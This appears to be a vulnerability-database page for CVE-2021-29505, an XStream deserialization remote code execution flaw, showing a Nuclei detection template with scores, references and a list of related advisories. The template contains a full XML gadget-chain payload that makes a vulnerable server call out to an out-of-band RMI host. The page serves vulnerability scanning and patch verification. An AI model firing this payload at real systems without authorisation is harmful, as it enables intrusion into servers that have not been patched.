Lucene search
ProjectDiscoveryNUCLEI:CVE-2021-29505HistoryMar 12, 2023 - 3:38 a.m.
XStream <1.4.17 - Remote Code Execution
2023-03-1203:38:05
ProjectDiscovery
github.com
4
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.048 Low
EPSS
Percentile
92.6%
XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
id: CVE-2021-29505
info:
name: XStream <1.4.17 - Remote Code Execution
author: pwnhxl
severity: high
description: |
XStream before 1.4.17 is susceptible to remote code execution. An attacker can execute commands of the host by manipulating the processed input stream, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the target system.
remediation: Patched in 1.4.17.
reference:
- https://paper.seebug.org/1543/
- https://github.com/vulhub/vulhub/blob/master/xstream/CVE-2021-29505/README.zh-cn.md
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-29505
- https://github.com/x-stream/xstream/security/advisories/GHSA-7chv-rrw6-w6fc
- https://nvd.nist.gov/vuln/detail/cve-2021-29505
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-29505
cwe-id: CWE-502
epss-score: 0.04677
epss-percentile: 0.91814
cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: xstream_project
product: xstream
tags: cve2021,cve,oast,vulhub,xstream,deserialization,rce,xstream_project
http:
- raw:
- |
POST / HTTP/1.1
Host: {{Hostname}}
Content-Type: application/xml
<java.util.PriorityQueue serialization='custom'>
<unserializable-parents/>
<java.util.PriorityQueue>
<default>
<size>2</size>
</default>
<int>3</int>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.org.apache.xpath.internal.objects.XString'>
<m__obj class='string'>com.sun.xml.internal.ws.api.message.Packet@2002fc1d Content</m__obj>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
<javax.naming.ldap.Rdn_-RdnEntry>
<type>12345</type>
<value class='com.sun.xml.internal.ws.api.message.Packet' serialization='custom'>
<message class='com.sun.xml.internal.ws.message.saaj.SAAJMessage'>
<parsedMessage>true</parsedMessage>
<soapVersion>SOAP_11</soapVersion>
<bodyParts/>
<sm class='com.sun.xml.internal.messaging.saaj.soap.ver1_1.Message1_1Impl'>
<attachmentsInitialized>false</attachmentsInitialized>
<nullIter class='com.sun.org.apache.xml.internal.security.keys.storage.implementations.KeyStoreResolver$KeyStoreIterator'>
<aliases class='com.sun.jndi.toolkit.dir.LazySearchEnumerationImpl'>
<candidates class='com.sun.jndi.rmi.registry.BindingEnumeration'>
<names>
<string>aa</string>
<string>aa</string>
</names>
<ctx>
<environment/>
<registry class='sun.rmi.registry.RegistryImpl_Stub' serialization='custom'>
<java.rmi.server.RemoteObject>
<string>UnicastRef</string>
<string>{{interactsh-url}}</string>
<int>1099</int>
<long>0</long>
<int>0</int>
<long>0</long>
<short>0</short>
<boolean>false</boolean>
</java.rmi.server.RemoteObject>
</registry>
<host>{{interactsh-url}}</host>
<port>1099</port>
</ctx>
</candidates>
</aliases>
</nullIter>
</sm>
</message>
</value>
</javax.naming.ldap.Rdn_-RdnEntry>
</java.util.PriorityQueue>
</java.util.PriorityQueue>
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "dns"
- type: word
part: body
words:
- "timestamp"
- "com.thoughtworks.xstream"
condition: or
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 500
# digest: 4b0a00483046022100dbbd8f5e47047dc1ce75b7aa5cebea7678b2035517dd765160b1b31106393cd7022100b3ecc5d68e800b780f78acdae9aa0f9f80b4d2b8778cc7a32e7fce49e0ff5c60:922c64590222798bb761d5b6d8e72950Related
nessus
nessus
openSUSE 15 Security Update : xstream (openSUSE-SU-2021:1995-1)
2021-07-16 00:00:00
Atlassian Jira 8.17.x < 8.18.0 (JRASERVER-72669)
2022-07-06 00:00:00
ibm
ibm
cve
cve
CVE-2021-29505
2021-05-28 21:15:00
openvas
openvas
Debian: Security Advisory (DLA-2704-1)
2021-07-06 00:00:00
SUSE: Security Advisory (SUSE-SU-2021:1995-1)
2021-06-18 00:00:00
openSUSE: Security Advisory for xstream (openSUSE-SU-2021:1995-1)
2021-07-13 00:00:00
atlassian
atlassian
Vulnerable version of XStream used in Jira Server and Data Center - CVE-2021-29505
2021-08-04 14:52:08
Vulnerable version of XStream used in Jira Server and Data Center - CVE-2021-29505
2021-08-04 14:52:08
XStream upgrade to 1.4.17
2021-05-20 04:00:23
github
github
XStream is vulnerable to a Remote Command Execution attack
2021-05-18 18:36:27
oraclelinux
oraclelinux
xstream security update
2021-07-13 00:00:00
ubuntucve
ubuntucve
CVE-2021-29505
2021-05-28 00:00:00
osv
osv
XStream is vulnerable to a Remote Command Execution attack
2021-05-18 18:36:27
CVE-2021-29505
2021-05-28 21:15:08
libxstream-java - security update
2021-07-05 00:00:00
githubexploit
githubexploit
Exploit for Code Injection in Xstream Project Xstream
2021-06-08 05:27:57
prion
prion
Design/Logic Flaw
2021-05-28 21:15:00
suse
suse
Security update for xstream (important)
2021-07-11 00:00:00
Security update for xstream (important)
2021-06-24 00:00:00
debian
debian
[SECURITY] [DLA 2704-1] libxstream-java security update
2021-07-05 16:43:05
[SECURITY] [DSA 5004-1] libxstream-java security update
2021-11-10 20:29:25
[SECURITY] [DSA 5004-1] libxstream-java security update
2021-11-10 20:29:25
amazon
amazon
Important: xstream
2021-08-04 20:32:00
seebug
seebug
XStreamθΏη¨δ»£η ζ§θ‘ζΌζ΄οΌCVE-2021-29505οΌ
2021-05-17 00:00:00
redhat
redhat
(RHSA-2021:2683) Important: xstream security update
2021-07-12 07:29:15
(RHSA-2022:0297) Moderate: Red Hat Decision Manager 7.12.0 security update
2022-01-26 16:28:59
redhatcve
redhatcve
CVE-2021-29505
2021-06-01 19:12:54
veracode
veracode
Remote Code Execution
2021-05-19 04:56:37
debiancve
debiancve
CVE-2021-29505
2021-05-28 21:15:00
centos
centos
xstream security update
2021-07-13 21:13:30
mageia
mageia
Updated xstream packages fix security vulnerabilities
2021-07-25 17:45:06
fedora
fedora
[SECURITY] Fedora 33 Update: xstream-1.4.18-2.fc33
2021-10-12 23:47:14
[SECURITY] Fedora 34 Update: xstream-1.4.18-2.fc34
2021-10-12 23:45:05
[SECURITY] Fedora 35 Update: xstream-1.4.18-2.fc35
2021-10-29 23:18:39
oracle
oracle
Oracle Critical Patch Update Advisory - July 2022
2022-07-19 00:00:00
Oracle Critical Patch Update Advisory - October 2021
2021-10-19 00:00:00
Oracle Critical Patch Update Advisory - January 2022
2022-01-18 00:00:00
8.8 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
LOW
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
HIGH
Integrity Impact
HIGH
Availability Impact
HIGH
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
8.9 High
AI Score
Confidence
High
6.5 Medium
CVSS2
Access Vector
NETWORK
Access Complexity
LOW
Authentication
SINGLE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:S/C:P/I:P/A:P
0.048 Low
EPSS
Percentile
92.6%
Related for NUCLEI:CVE-2021-29505